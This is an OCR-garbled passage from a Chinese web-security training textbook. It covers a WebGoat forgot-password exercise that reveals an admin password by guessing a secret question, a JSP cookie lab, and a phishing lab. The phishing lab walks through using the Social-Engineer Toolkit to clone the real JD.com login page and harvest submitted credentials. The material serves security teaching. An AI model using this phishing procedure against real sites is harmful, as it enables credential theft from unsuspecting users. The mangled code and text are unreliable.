J Forgot Password 一 Microsoft Internet Explorer 
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General 


Access Control Flaws JSESSIONID €? BD095ADGADF86DD34C668A80AFGE1DCE 

AJAX Security 

Authentication Flaws Web applications frequently provide their users the ability to retrieve a forgotten password. 
A— Unfortunately, many web applications fail to implement the mechanism properly. The 
Cusen Strange information required to verify the identity of the user is often overly simplistic. 
Forgot Password 
Basic Authentication General Goal(s): E 
Multi Level Login 1 
Muiti Level Login 2 Users can retrieve their password if they can answer the secret question properly. There is 


no lock-out mechanism on this 'Forgot Password' page. Your username is 'webgoat' and youl 
favorite color is 'red'. The goal is to retrieve the password of another user. 


Webgoat Password Recovery 


Please input your username. See the OWASP admin if you do not have an 
account. 


*Required Fields 


Insecure Storage 
*User Name: admin 


D 
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AJAX Security 
Authentication Flaws Web applications frequently provide their users the ability to retrieve a forgotten password. 
— Unfortunately, many web applications fail to implement the mechanism properly. The 
Dor Stress information required to verify the identity of the user is often overly simplistic. 
Forgot Password 
Basic Authentication General Goal(s): 
Multi Level Login 1 
Multi Level Login 2 Users can retrieve their password if they can answer the secret question properly. There is 
no lock-out mechanism on this 'Forgot Password' page. Your username is 'webgoat' and youl 
favorite color is 'red'. The goal is to retrieve the password of another user. E 
* Incorrect response for admin. Please try again! 
Webgoat Password Recovery 
Secret Question: What is your favorite color? 
*Required Fields 
*Answer: [green . — | L3 
\ .  " 
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6-30 回答 认证 问题 


7b Forgot Password 一 Microsoft Internet Explorer 
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General 
Access Control Flaws JSESSIONID > BD095ADGADF86DD34C668ABOAFGE1DCE 
AJAX Security 
Authentication Flaws Web applications frequently provide their users the ability to retrieve a forgotten password. 
Password Ste Unfortunately, many web applications fail to implement the mechanism properly. The 
Coord Strength information required to verify the identity of the user is often overly simplistic. 


v Forgot Password 
General Goal(s): 


Multi Level Login 1 Users can retrieve their password if they can answer the secret question properly. There is 
Multi Level Login 2 no lock-out mechanism on this 'Forgot Password' page. Your username is Webgoat and youl 
favorite color is 'red'. The goal is to retrieve the password of another user. 


* Congratulations. You have successfully completed this lesson. 


Webgoat Password Recovery 
For security reasons, please change your password immediately. 


Results: 

Username: admin 

Color: green 

Password: 2275$starBoOrn3 
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6-31 得 到 admin 账户 的 密码 
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WegGoat 是 一 个 非常 优秀 和 广 受 网 络 安全 界 关 注 的 平台 ,该 平台 提供 了 非常 丰富 的 内 
容 , 这 些 内 容 包 括 有 关 Web 攻击 与 防范 的 主要 知识 。 与 普通 的 学 习 平台 相 比 ,该 平台 提供 
了 良好 的 在 线 互 动 和 在 线 帮 助 功 能 ,很 适合 初学 者 使 用 。 

通过 WegGoat 工具 的 学 习 , 可 以 给 读者 一 定 的 局 发 : 充分 利用 互联 网 上 的 开放 平台 次 
源 ,很 多 平台 都 提供 了 几乎 与 现实 互联 网 应 用 环境 中 相同 的 有 关 安 全 问题 的 解决 方法 和 思 
路 ,通过 系统 的 学 习 , 访 痢 不 仅 能 掌握 有 关 安 全 问题 的 原理 和 解决 方案 ,还 可 扩展 知识 面 , 开 
拓 学 习 视 野 。 


6.3 Cookie 对 象 操作 


6.3.1 预备 知识 : 关于 Cookie 


Cookie 是 指 某 些 网 站 为 了 记录 和 辨别 用 户 号 份 ,存储 在 用 户 端 计算 机 上 的 文件 。 
Cookie 的 格式 实际 上 是 一 段 纯 文本 信息 ,由 服务 器 随 着 网 页 一 起 发 送 到 客户 端 ,并 保存 在 
客户 端 便 盘 的 指定 目录 中 。 有 人 认为 Cookie 会 造成 严重 的 安全 威胁 ,但 事实 并 非 如 此 。 服 
务 需 谈 取 Cookie 时 ,只 能 读 取 到 与 该 服务 器 相关 的 信息 。Cookie 永远 不 会 以 任何 方式 执 
行 , 因 此 也 不 会 市 来 病毒 或 攻击 用 户 的 系统 , 且 Cookie 具有 了 时效 性 。 例 如 , 当 用 户 设 置 了 
Cookie 的 存活 时 间 为 1 分 钟 时 ,1 分 钟 后 这 个 Cookie 就 会 被 浏览 更 自动 删除 。 

Cookie 给 网 站 和 用 户 融 来 的 好 处 很 多 ,如 . 

(1) Cookie 能 使 站 点 跟踪 特定 访问 者 的 访问 次 数 、 最 后 访问 时 间 等 信息 。 

(2) Cookie 能 告诉 在 线 广告 商 广 告 被 单 击 的 次 数 ,从 而 可 以 更 精确 地 投放 广告 。 

(3) Cookie 在 有 效 期 限 未 到 时 ,能 够 使 用 户 在 不 需要 重复 输入 用 户 名 和 密码 的 情况 下 
进入 曾经 浏览 过 的 一 些 站 点 。 

(4) Cookie 能 够 帮助 站 点 统计 用 户 个 人 资料 以 实现 各 种 各 样 的 个 性 化 服务 ,也 可 以 使 
用 Cookie 来 编写 一 些 功 能 较 强 的 应 用 程序 。 

不 过 ,Cookie 也 存在 安全 问题 ,攻击 者 可 以 分 析 存 放 在 本 地 的 Cookie 文件 ,并 进行 
Cookie 期 骗 攻击 。 


6.3.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,在 熟悉 Cookie 组 成 及 工作 原理 的 基础 上 ,通过 具体 操作 ,掌握 Cookie 的 
产生 过 程 、 应 用 特点 和 安全 管理 方法 。 

2. 实验 条 件 

本 实验 可 以 在 任意 一 台 运 行 Windows XP 及 以 上 版 本 的 操作 系统 上 运行 。 为 了 提高 程 
订 的 编写 和 修改 效率 ,可 以 安装 较为 专业 的 文本 编辑 硕 EditPlus, 符 代 Windows 操作 系统 
中 的 “记事 本 ”。 
6.3.3 实验 过 程 


步骤 1: 登录 到 实验 用 计算 机 。 本 实验 中 ,通过 Cookie 保存 用 户 提 交 的 信息 中 包括 以 
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FITTAN- 
(1) usingCookie. html, usingCookie. html 是 一 个 HTML 表单 ,其 中 设置 了 几 种 可 供 
用 户 选 择 及 输入 数据 表单 的 选项 。usingCookie. html 文件 代码 为 : 


<html> 
< head > 
< title»jz JH Cookie </title> 
< meta http - equiv = "keywords" content = "keywordl,keyword2,keyword3"» 
< meta http - equiv = "description" content = "this is my page"> 
< meta http ~ equiv = "content - type" content = "text/html; charset = gb2312"> 
</head> 
< body > 
< h2 align = "center"> 用 户 信息 </h2 > 
< form method = "post" action = "usingCookie. jsp" > 
< table border = 1 align = "center"> 
<Er 
< td> A : </td> 
< td»« input type = "text" name = "name" /» «/td > 
«te 
SLE 
< td 2 TE 5i]: </td> 
< td» « input type = "radio" name = "sex" value = "M" checked »Zr« input type = "radio" 
name = "sex" value = "F"></td> 
«/tr» 
S LP 
< td> 喜 好 颜色 : </td> 
< 七 d > 
< select size- 1 name = "color"> 
< option selected > none 
< option > blue 
< option > green 
« option » red 
< option > yellow 
</ select > 
«/td» 
«/tr» 
< tr colspan- "2" align = "center" 
< td»« input type = "submit" value = "发 送 资 料 "/></td> 
cie 
</table> 
</form> 
«/ body > 
</html > 


(2) usingCookie. jsp。 接 收 usingCookie. html 表单 传送 过 来 的 变量 数据 ,并 将 这 些 数 
HTA Cookie 中 ,然后 将 网 页 定 回 到 responseCookie. jsp。usingCookie. jsp 文件 代码 为 : 
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< html > 

< head > 
< base href = "< % = basePath % >"> 
< title»jz HH Cookie </title> 
< meta http - equiv = "pragma" content = "no - cache"> 
< meta http - equiv = "cache - control" content = "no - cache"> 
< meta http - equiv = "expires" content = "0"> 
< meta http - equiv = "keywords" content = "keywordl, keyword2,keyword3"» 
< meta http - equiv = "description" content = "This is my page"> 
cp 
< link rel = "stylesheet" type = "text/css" href = "styles. css"> 
一 一 > 

</head > 

<body> 
<% 
String strname = request. getParameter ("name"); 
String strsex = request. getParameter ("sex"); 
String strcolor = request. getParameter ("color"); 
Cookie nameCookie = new Cookie("name", java. net. URLEncoder. encode( strname)); 
Cookie sexCookie = new Cookie("sex",strsex); 
Cookie colorCookie = new Cookie("color",strcolor); 
nameCookie. setMaxAge(30); 
sexCookie. setMaxAge(30); 
colorCookie. setMaxAge(30); 
response. addCookie(nameCookie); 
response. addCookie(sexCookie); 
response. addCookie(colorCookie); 
response. sendRedirect ( " responseCookie. jsp"); 

% > 
«/ body > 
«/html > 


(3) responseCookie. jsp. Web 应 用 程序 会 谈 取 存储 在 Cookie 中 的 用 户 数据 ,并 根据 
需要 经 变化 后 输出 到 浏览 器 。responseCookie. jsp 文件 代码 为 : 


< html > 
< head > 
< base href = "< % = basePath $% >"> 
<title > 获取 cookie 资料 </title > 
< meta http- equiv = "pragma" content = "no - cache"» 
< meta http - equiv = "cache - control" content = "no - cache" 
< meta http - equiv = "expires" content = "0"> 
< meta http- equiv = "keywords" content = "keywordl, keyword2,keyword3"- 
< meta http - equiv = "description" content = "This is my page"» 
«/head > 
< body > 
<% 
Cookie cookies[] = request.getCookies(); 
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if(cookies == null) 
out. print(" 没 有 cookie"); 


else 
{ 
try 
{ 
if(cookies. length == 0) 
{ 
System. out. println(" 客 户 端 禁止 写 人 cookie"); 
} 
else 
{ 
int Count = cookies. length; 
String name = "",sex- "",color- ""; 
for(inti-20;i«Count;i--) 
if(cookies[i].getName(). equals("name")) 
name = cookies[ i]. getValue(); 
else if(cookies[i].getName(). equals("sex")) 
sex = cookies[ i].getValue(); 
else if(cookies[ i].getName(). equals("color")) 
color = cookies[ i].getValue(); 
% > 


< font color = "< % = color %>" size=5> 

<% = URLDecoder.decode(name) %> 

«/font » 

您 好 .以 下 是 您 的 个 人 资料 .….< 了 > 

<% 

out. println(" 性 别 : <br>"); 

if(sex. equals("M")) 
out. println("« img src = 'images/boy. png '> 我 是 男生 ..<p> "); 
else 

out.println("« img src = 'images/gril. jpg '> 我 是 女生 ..«p» "); H 

catch(Exception e) 


{ 
System. out. println(e); 


) 
]) $8» 
«/ body > 
«/html > 


将 以 上 usingCookie. html,usingCookie. jsp 和 responseCookie. jsp 文件 保存 在 Web123 
文件 夹 中 。 

步骤 2. 在 浏览 器 地 址 栏 中 输入 “192. 168. 1. 156:8080/ web123/usingCookie. html”, 则 
运行 usingCookie. html 文件 ,显示 如 图 6-32 所 示 的 对 话 框 。 其 中 ,192. 168. 1. 156 是 本 机 
的 IP 地址 ,也 可 以 修改 为 计算 机 名 ; 8080 为 设置 的 页 面 打开 端口 号 。 

步骤 3: 在 浏览 器 地 址 栏 中 输入 “192. 168. 1. 156:8080/webl23/responseCookie. jsp". 
打开 如 图 6-33 所 示 的 窗口 ,说 明 暂 时 没有 Cookie. 
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€ - Q | [0192.168.1.156:8080/web/usineCookie.htnl 
[C] Windows ["| findows Media [ 免费 Hotmail [站 自 定义 链接 (O] 从 IE 中 导入 


用 户 信息 


ts [| 0 0 00 0] 
EH. Bozo 


姓名 : 
Ese. none M 
[Ez 


6-32 ”运行 usingCookie. html 文件 后 显示 的 信息 


7 [3 获 了 cookie 资料 


€ — CC [i 192.168. 1. 156: 8080/web/responseCookie. jsp 
[j Windows [] Windows Media [] 免费 Hotmail ['] BENE CA IE 中 导入 


1S8 cookie 


6-33 暂时 没有 Cookie 
步骤 4: 重新 在 浏览 器 中 运行 usingCookie. html, 并 填写 一 些 信 息 , 如 图 6-34 所 示 。 


[D 运用 Cookie 
€ — Q' 0192.168.1,156:8080/web/usineCookie.htnl 
[ Windows [ Windows Media [ 免费 Hotmail [^ 自 定义 链接 (CO) 从 IE 中 导入 


用 户 信息 


图 6-34 输入 表单 信息 


步骤 5: 单 击 “ 发 送 资 料 ” 按 钮 ,运行 responseCookie. jsp 后 ,Cookie 值 已 经 显示 在 页 面 
中 ,如 图 6-35 所 示 。 

步骤 6: 运行 usingCookie. html 后 ,修改 一 些 信息 。 例 如 ,将 "喜好 颜色 ?由 red 改 为 
green ,如 图 6-36 所 示 。 

步骤 7: 单 击 “ 发 送 资料 ”按钮 ,可 以 看 到 Cookie 值 发 生 了 变化 ,如 图 6-37 所 示 。 
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[5 H cooki e 资 料 


€ > e [] 192. 168. 1. 156:8080/web/responseCookie. jsp 
[) findows [) Windows Media [ 免费 Hotmail [' 自 定义 链接 O 从 I 中 导入 


xiaofang 您 好 。 以 下 是 您 的 个 人 资料 


性 别 ， 
PREZE.. 


图 6-35 已 经 显示 存在 Cookie ff 


b 运用 Cookie 
€ > Q' [)192.168.1. 156: 8080/web/usinzCookie.htnl 
[C] Windows ["| findows Media [] 免费 Hotmail [^ 自 定义 链接 门 从 IE 中 导入 


6-36 ”修改 表单 信息 


[5 SER cooki e 资 料 
€ > Q |[ 192.168.1. 156:8080/web/responseCookie. jsp | 
[) Windows [) Windows Media [ 免费 Hotmail N 自 定 义 链接 O 从 IE 中 导入 


xiaoming 您 好 。 以 下 是 您 的 个 人 资料 


性 别 ， 
PRESH.. 


图 6-37 Cookie 的 值 发 生 了 变化 


6.3.4 任务 与 思考 


在 该 实验 的 基础 上 ,读者 可 以 进一步 学 习 有 关 Cookie 的 知识 。 
1. Cooke 的 设置 方式 


HttpServletResponse 的 addCookie 方法 提供 了 Cookie 设置 功能 ,使 用 addCokie 方法 可 以 
将 Cookie 加 入 Set-Cookie 应 答 头 中 ,如 Cookie userCookie = new Cookie("user"，"admin") 、 
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response. addCookieCuserCookie) 5$, 5 Cookie 设置 有 关 的 操作 还 包括 setMaxAge 和 
setPath 。 

(D setMaxAge, setMaxAge 用 于 设置 Cookie 过 期 之 前 的 时 间 ,以 秒 计 算 。 如 果 不 设 
置 该 值 , 则 Cookie 只 在 当前 会 话 内 有 效 ,而 且 这 些 Cookie 不 会 保存 到 磁盘 上 。 

注意 : 删除 Cookie 就 是 通过 该 方法 实现 的 。 将 要 删除 Cookie 过 期 之 前 的 时 间 指 定 为 
0 ,就 可 以 达到 删除 该 Cookie 的 目的 。 

(2) setPath。setPath 用 于 设置 Cookie 适用 的 路 径 。 如 果 不 指定 路 径 ,Cookie 将 返回 
当前 页 面 (JSP 页 面 或 Servlet 的 映射 ) 所 在 的 目录 。 对 于 Cookie 路 径 的 设置 ,还 需要 注意 
以 下 4 点 。 

(D 所 有 的 Cookie 都 是 有 路 径 的 。 

D 该 方法 设置 的 路 径 为 客户 端 路 径 , 即 */” 代 表 服 务 带 根 目录 。 

© 该 方法 设置 路 径 时 ,/myWeb/ 与 /myWeb 是 不 同 的 ,前 者 可 以 关联 到 服务 器 的 
myWeb 目录 下 ,而 后 者 则 不 可 以 。 

QD 该 方法 设置 路 径 时 ,没有 相对 目录 的 说 法 , 即 不 论 在 哪个 目录 下 设置 
setPathC/myWeb/) ,该 Cookie 都 将 关联 到 服务 颖 的 myWeb 目录 下 (setPath(/myWeb) 则 
不 可 以 ) ,而 不 是 当前 目录 的 myWeb 的 子 目录 下 ; 同样 ,设置 setPath(myWeb/) 和 setPath 
(myWeb) 也 不 能 关联 到 当前 目录 的 myWeb 的 子 目录 下 。 

大 多 数 情 况 下 ,如果 无 法 成 功 删除 Cookie, 主要 原因 与 目录 的 不 正确 配置 有 关 。 一 个 
常见 原因 是 在 某 一 个 目录 中 设置 『 Cookie( 没 有 调用 setPath 方法 ) , 却 在 另 一 个 目录 中 删 
除 该 Cookie( 其 实 是 调用 setMaxAge 方法 )。 

2. Cookie 的 读 取 

MR Pi Cookie 时 调用 的 是 HttpServletRequest 的 getCookies 方法 。 该 方法 返 
回 一 个 与 HTTP 请 求 头 中 内 容 相 对 应 的 Cookie 对 象 数组 。 得 到 这 个 数组 之 后 ,一般 可 通 
过 循环 方式 访问 其 中 的 各 个 元 素 , 调 用 getName 检查 各 个 Cookie 的 名 称 ,直至 找到 目标 
Cookie。 然 后 对 这 个 目标 Cookie 调用 getValue, 根 据 获 得 的 结果 进行 其 他 人 处理。 

需要 注意 的 是 ,如 果 JSP Servlet 所 在 目录 (Servlet 为 其 映射 目录 ) 的 父 目 录 中 有 同 
名 Cookie, 则 request. getCookie() 方 法 得 到 的 Cookie 数组 中 保存 的 是 其 父 目 录 中 Cookie 
的 信息 。 


6.4 网 络 钓鱼 攻击 


6.4.1 预备 知识 : 了 解 网 络 钓鱼 


网 络 钓鱼 (phishing) 由 钓鱼 (fishing) 一 词 演变 而 来 。 在 网 络 钓鱼 过 程 中 ,攻击 者 使 用 
诱饵 (如 电子 邮件 .手机 短信 、QQ 链接 等 ) 将 攻击 代码 发 送 给 大 量 用 户 ,期待 少数 安全 意识 
35 89 FH P" E 3" ,进而 达到 “钓鱼 (如 宠 取 用 户 的 隐私 信息 ) 的 目的 。 

网 络 钓鱼 的 具体 实施 过 程 为 : 不 法 分 子 利用 各 种 手段 ,仿冒 真实 网 站 的 URL 地 址 及 页 
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面 内 容 ,或 者 利用 真实 网 站 服务 需 程 序 上 的 漏洞 ,在 站 点 的 某 些 网 页 中 插入 危险 的 HTML 
代码 ,以 此 来 骗取 用 户 银行 卡 或 信用 卡 账号 、 密 码 等 私人 资料 。 

ER R A E E TEH (Anti-Phishing Working Group. APWG) 给 网 络 钓鱼 的 定义 
是 : 网 络 钓鱼 是 一 种 利用 社会 工程 学 和 技术 手段 禄 取 用 户 个 人 身份 数据 和 财务 账户 凭证 的 
网 络 攻击 方式 。 采 用 社会 工程 学 手段 的 网 络 钓鱼 攻击 往往 是 向 用 户 发 送 骨 充 合 法 企业 或 机 
构 的 欺骗 性 电子 邮件 、 手 机 短信 等 ,引诱 用 户 回 复 个 人 敏感 信息 或 单 击 其 中 的 链接 访问 伪造 
的 网 站 ,进而 泄露 凭证 信息 (如 用 户 名 、 密 码 、 账 号 ID, PIN 码 或 信用 卡 详细 信息 等 ) 或 下 载 
恶意 软件 。 而 技术 手段 的 攻击 则 是 直接 在 个 人 计算 机 上 移植 恶意 代码 ,采用 某 些 技 术 手 段 
直接 镭 取 凭证 信息 ,如 使 用 专门 开发 的 软件 拦截 用 户 的 用 户 名 和 密码 误导 用 户 访 问 伪 造 的 
网 站 等 。 

网 页 挂 马 和 钓鱼 网 站 是 恶意 网 址 的 两 个 主要 形式 。 但 是 单纯 的 钓鱼 网 站 由 于 本 身 不 包 
含 恶 意 代码 ,因此 很 难 被 传统 的 安全 技术 方法 所 识别 。 男 外 , 绝 大 多 数 钓 鱼网 站 设 在 境外 ， 
因此 很 难 通过 法 律 手段 进行 有 效 的 打击 。 


6.4.2 实验 目的 和 条 件 


1. 实验 目的 

通过 网 络 钓鱼 实验 ,使 读者 掌握 一 种 钓鱼 网 站 的 搭建 方式 和 过 程 ,加 深 对 网 络 钓鱼 攻击 
的 理解 ,进一步 培养 防范 网 络 钓鱼 攻击 的 能 力 。 

2. 实验 条 件 

本 实验 所 需要 的 软 人 硬件 清单 如 表 6-2 所 示 。 


X 6-2 ”网络 钓鱼 攻击 实验 清单 


类 型 HR 号 软 硬 件 要 求 规 格 


E 
social-engineer-toolkit 
L 

en — | 0: — |  MAREHE | Woa 
| 3 | 软件 版 本 U ü O X 


6.4.3 实验 过 程 


步骤 1: 正常 登录 到 实验 场景 中 运行 BTS 操作 系统 的 攻击 机 ,如 果 进 入 的 是 命令 行 界 
面 ,可 输入 “startx” 命 令 切 换 到 图 形 界面 ,如 图 6-38 所 示 。 

步骤 2: 打开 终端 窗口 ,输入 “cd /pentest/exploits/set/" M 4 . UJ 1& $l| /pentest/ 
exploits/set/ 目录 ,如 图 6-39 所 示 。 

步骤 3: 输入 “. /set” 命 令 , 启 动 set 工具 。 当 出 现 Do you agree to the terms of service 
Ly/nj: 信 息 时 ,输入 “y”, 表 示 同 意 ,如 图 6-40 所 示 。 
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Applications Places System 


A 


Install BackTrack 


ack | track 5 


6-38 BTS 图 形 界 面 


^ vv X root@bt: /pentest/exploits/set 
| File Edit View Terminal Help 
Brootgbt:-£& cd /pentest//exploits/set/ 
grootébt:/pentest/exploits/sets ls 
config readme set set-proxy  sSsetup-py--src 


{modules reports set-automate set-update set-web 
Foot@dt:/pentest/exploits/set# 


图 6-39 ”切换 到 /pentest/exploits/set/ 目录 
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^ v X root@bt: /pentest/exploits/set 
File Edit View Terminal Help 
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 、 


The above licensing was taken from the BSD ticensing=and is applied to Social-En 
gineer Toolkit as well. 


Note that the Social-Engineer Toolkit is provided ass? and isẹa royalty free o 
pen-source application. 


Feel free to modify, use, change, market, do whatever you wani with it as lōħg a 
S you give the appropriate credit where credit 

is due (which means giving the authors the credit they deserve Tpawsiting it). 

Also note that by using this software, if you ever 

see the creator of SET in a bar, yoy are required to giye him tugang" byy\him 

a beer. Hug mi$i.last.at least 5 segondii. Author 

holds tbeé"righf t8 ratesé th&dhug of tha baer. 


Do you agree to the terms of service [y/n]: y X 


图 6-40 同意 启动 相应 的 服务 


步骤 4: 当 进 入 如 图 6-41 所 示 的 欢迎 界面 时 ,选择 1)Social-Engineering Attacks 选项 ， 
即 社会 工程 学 攻击 方式 。 


^ * X root@bt: /pentest/exploits/set 
File Edit View Terminal Help 
[--«] Homepage: https://www.trustedsec.com [--- 1 


Welcome to the Social-Engineer Toolkit (SET)-—Yoewr-one 
stop shop for all of your social-engineering needs.. 


Join us on irc.freenode.net in channel £setoolkLi 
The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 


Select from the menu: 


1) Social-EBgineeLing ALtücks 

27 Fast-Traek BeneifafionWEsting 

3A Thf*d Paptyw Modyles 

4) Update the Metasploit FramewoEk 

5) Update the Social-Engineer Toolkit 
6) Update SET configuration 

7) Help, Credits, and About 


99) Exit the Social-Engineer Toolkit 


二 > 


图 6-41 选择 社会 工程 学 攻击 方式 


步骤 5: 在 出 现 的 如 图 6-42 所 示 的 界面 中 ,选择 2)Website Attack Vectors 选项 , 即 以 
网 站 为 载体 攻击 的 方式 。 
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^ v X root@bt: /pentest/exploits/set 
File Edit View Terminal Help 


Join us on irc.freenode.net in channel £setoolkit 


The Social-Engineer Toolkit is a product of TrustedSec. 


Visit: https://www.trustedsec.com 
Select from the menu: 


1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 

3) Infectious Media Generator 

4) Create a,Payload and Listener 
5) Mass Mailer Attack 

87 Apdüino-Based A&dfaEk vagtor 

Ph SMS*Spodfüad NiracKyectak 

8) Wireless Access Point Attack Wector 
9) QRCode Generator Attack Vector 
19) Powershell?Attack Vectors 

11) Third Party Modules 


99) Return back to the main menu. 


Set» 2] 


图 6-42 ”选择 以 网 站 为 载体 攻击 


步骤 6: 在 出 现 的 如 图 6-43 所 示 的 界面 中 选择 4) Tabnabbing Attack Method 选项 , 即 
标签 钓鱼 方法 。 


tabt: /pentest/exploits/set 
File Edit View Terminal Help 


and the Back|Track team. This method utilizes iframe replacements to 
make the highlighted URL link to appear legitimate however when clicked 
a window pops up then is replaced with the mattctews-Llink. You can edit 
the link replacement settings in the set config if its too Skgw/fast. 


The Multi-Attack method will add a combination of artatks through the-web attac 
k 

menu. For example you can utilize the Java Applet, Metasploif Browser, 
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack 

all at once to see which is successful. 


Java Applet Attack Method 

Metasplaoit Browser Exploit Me&hod 
CredentiBl.HaryesterL.ABtack Method 
Talffiabbigig Attack Method 

MaMaLef thin thei idle DATPERackfMet bd 

Web Jacking Attack Method 

Multi-Attack Web Method 

Victim Web Profiler 

Create or import a CodeSigning Certificate 


Return to Maın Menu 


图 6-43 选择 标签 钓鱼 方法 


步骤 7: 在 出 现 的 如 图 6-44 所 示 的 界面 中 选择 2)Site Cloner 选项 , 即 网 站 克隆 方式 。 
步骤 8. 在 出 现 的 如 图 6-45 所 示 界 面 的 IP address for the POST back in Harvester/ 
Tabnabbing: 后 面 直 接 输 入 本 机 的 IP 地 址 。 
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^ v X root@bt: /pentest/exploits/set 
File Edit View Terminal Help 
9) Create or import a CodeSigning Certificate 


99) Return to Main Menu 


The first method will allow SET to import a Lis of pre-defingff web 
applications that it can utilize within the attack. 


The second method will completely clone a website of your chüpsing 


and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 


The third metod allows youBto impürt Wur own websit® pote fhgt-^you 
shetld ly hBvegansalidEx.hfaft wheB usihg he idpdTt website 
fumetiomality 


1) Web Templates 
2) Site Cloner 
3) Custom Import 


99) Return to Webattack Menu 


图 6-44 选择 网 站 克隆 方式 


^ v X root@bt: /pentest/exploits/set 
File Edit View Terminal Help 
applications that it can utilize within the attack. 


The second method will completely clone a webstite-ef«your choosing 
and allow you to utilize the attack vectors within the comptegely 
same web application you were attempting to-etorme- 


The third method allows you to import your own.wébsite, note amat yoa 
should only have an index.html when using thé import website 
functionality. 


1) Web Templates 
2) Site Cloner 
3) Custom Igport 


99*T Retürn t8 Webakteck Med 


set:webattack»2 
[-] This option is used for what IP the server will POST to. 
[-] If you're using an external IP, use your external IP for this 


Lt:webattack» IP address for the POST back in Harvestep/Tabnabbing http://192.1 


SET supports both HTTP and HTTPS 
[-] Example: http://www.thisisafakesite.com 
t:webattack» Enter the url to clone: 


图 6-45 输入 攻击 机 的 IP 地 址 


步骤 9. 在 如 图 6-46 所 示 操 作 界 面 的 Enter the url to clone: 后 面 输入 需要 进行 克隆 网 
站 的 URL ,以 便 针 对 访问 网 站 进行 钓鱼 操作 。 例 如 ,本 实验 将 针对 ”京东 ?的 用 户 登 录 界 面 
进行 网 络 钓鱼 ,所 以 可 在 浏览 希 的 地 址 栏 中 首先 打开 将 要 被 死 隆 的 “ 系 东 ”用户 登录 页 面 对 
应 的 URL , 当 能 够 正常 访问 后 ,将 对 应 的 URL 复制 到 Enter the url to clone: 后 面 。 
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^ v X root@bt: /pentest/exploits/set | 
File Edit View Terminal Help 


The second method will completely clone a website of your choosing a 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to ctone: 


The third method allows you to import your-own-weDSite, noi&that you 
should only have an index.html when using the impori-website 
functionality. 


1) Web Templates 
2) Site Cloner 
3) Custom Import 


99) Return to Webattack Menu 


sei ebalft ackoy 
e Wis aptid iS Used Ton What IPEthe Serie rnw po to. 
[-] If you're using an external IP,guse your external IP for fhis 


set:webattack» IP address for the POST back in Harvester/Tabnabb1TIg:http://192.1 
868.1.37 


[-] SET supports both HTTP and HTTPS 
iL- TES le; http: //www.thisisafakesite.com 
j | to clone:https: // passport. jd. com/new/togin. aspx?Ret 


| 253A 952 F% %2F%3Fu sources s3Dmedias26utm medium%3Dcpc%26utm 
Icampaign*3D*26utm term teni SEE 1 15 


图 6-46 复制 要 克隆 的 钓鱼 网 站 的 URL 


步骤 10: 复制 成 功 后 ,在 如 图 6-47 所 示 的 操作 界面 中 进行 监听 ,一 旦 有 数据 通过 元 隆 
的 网 址 发 送出 去 ,就 会 被 监听 到 。 


^ v X root@bt: /pentest/exploits/set 
File Edit View Terminal Help 
68.1.37 
[-] SET supports both HTTP and HTTPS 
l- | ER http://www.thisisafakesite.com 
yebattack» Enter the url to clone:https://passport. jd.cCOmgew/login.aspx?Ret 


urnüRL- https: 53AS%2F%2Fwww-: jd.com%2F%3Futm source%3Dmedias2outnm Beadiume3Dcpc%26utm 
campaign%3D%26utm term term*3Dsemmedia 1 15 


[*] Cloning the website: https://passport.jd.Com/new/login.aspx?ReturnhttpgS3A*2F 
*s2Fwww.jd.com*2F*s3Futm source*3Dmedia*26utm medium*s3Dcpc*26utf campaign*3D*s26utm 
term term*3Dsemmedia 1 15 


[*] This could take a little bit. 


J ip F ReaardB 


[!L1sT hase redd thie mM megge. 


Press | to continue 


Social-Engineer Toolkit Credential Harvester Attack 
Credential Harvester is running on port 80 
*] Information will be displayed to you as it rrives below: 


图 6-47 进行 数据 监听 


步骤 11: 返回 靶 机 Windows XP, 输 入 网 址 “http://192. 168. 1. 37/index2. html”, 该 网 


址 是 程序 殉 隆 出 来 的 网 站 地 址 ,所 显示 的 网 站 信息 即 被 克隆 的 钓鱼 网 站 信息 ,如 图 6-48 
HIZR o 
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a 登录 京东 一 Nicrosoft Internet Explorer 


文件 人 fF) 编辑 BE) SEV REA IAM 才 助 00 La 


Q% - O- iidG Ds y;;-00- 29,8 


地 址 (D) &) http: //192. 168. 1. 3T/index2. html 


JDE vuar 


Eea we” 


ASAP Z/PAUETL 


A 密码 
C KY Ta DEHER pigu? 


使 用 合作 网 站 账号 登录 京 来 : 


B EUR - Micro 


图 6-48 ”被 克隆 的 钓鱼 网 站 


步骤 12: 在 该 钓鱼 网 站 上 输入 用 户 名 和 密码 ,并 单 击 “登录 ”按钮 进行 提交 ,如 图 6-49 


所 示 。 


3 登录 京东 一 Nicrosoft Internet Explorer AEA 
XQ) REO 查看 W) WEG) IAV ”帮助 加) [d 


Qs-O iig st ye O B 39-8 
Hid D) | 入 http://192. 168. 1.31/index2. html gra sso 


^ 


[English] = 


口上 自动 登录 Eius? 


使 用 合作 网 站 账号 登录 京东 : 
| 


2 登录 京东 - Micro 


图 6-49 在 钓鱼 网 站 上 尝试 进行 用 户 登 录 


第 6 章 Web 浏 览 器 攻防 实 训 239 


步骤 13: 刚才 的 尝试 登录 信息 将 被 攻击 机 检测 到 ,所 输入 的 用 户 名 和 密码 将 显示 在 攻 
击 机 上 ,如 图 6-50 所 示 。 
^ v X root@bt: /pentest/exploits/set 


File Edit View Terminal Help 
Press to continue 


[*] Social-Engineer Toolkit Credential Harvester Attack 

[*] Credential Harvester is running on port 80 

[*] Information will be displayed to you as it arfives below: 
bogon - - [06/Aug/2013 03:16:49] "GET / HTTP/1.1" 200 - 

bogon [06/Aug/2013 03:16:57] "GET /index2.html HTTP/1.1" (200 


: machineNet- 
: machineCpu- 
: machineDisk- 
: authcode- 


A 6-50 在 攻击 机 上 显示 钓鱼 网 站 上 用 户 尝 试 登录 的 信息 


6.4.4 任务 与 思 


在 本 实验 的 基础 上 ,读者 可 以 对 网 络 钓 鱼 攻 击 相 关 的 内 容 进一步 进行 深入 学 习 。 伪 婆 
性 高 .时效 性 强 、 存 活 时 间 短 及 钓鱼 目标 广泛 等 是 网 络 钓鱼 攻击 的 主要 特点 。 网 络 钓鱼 总 是 
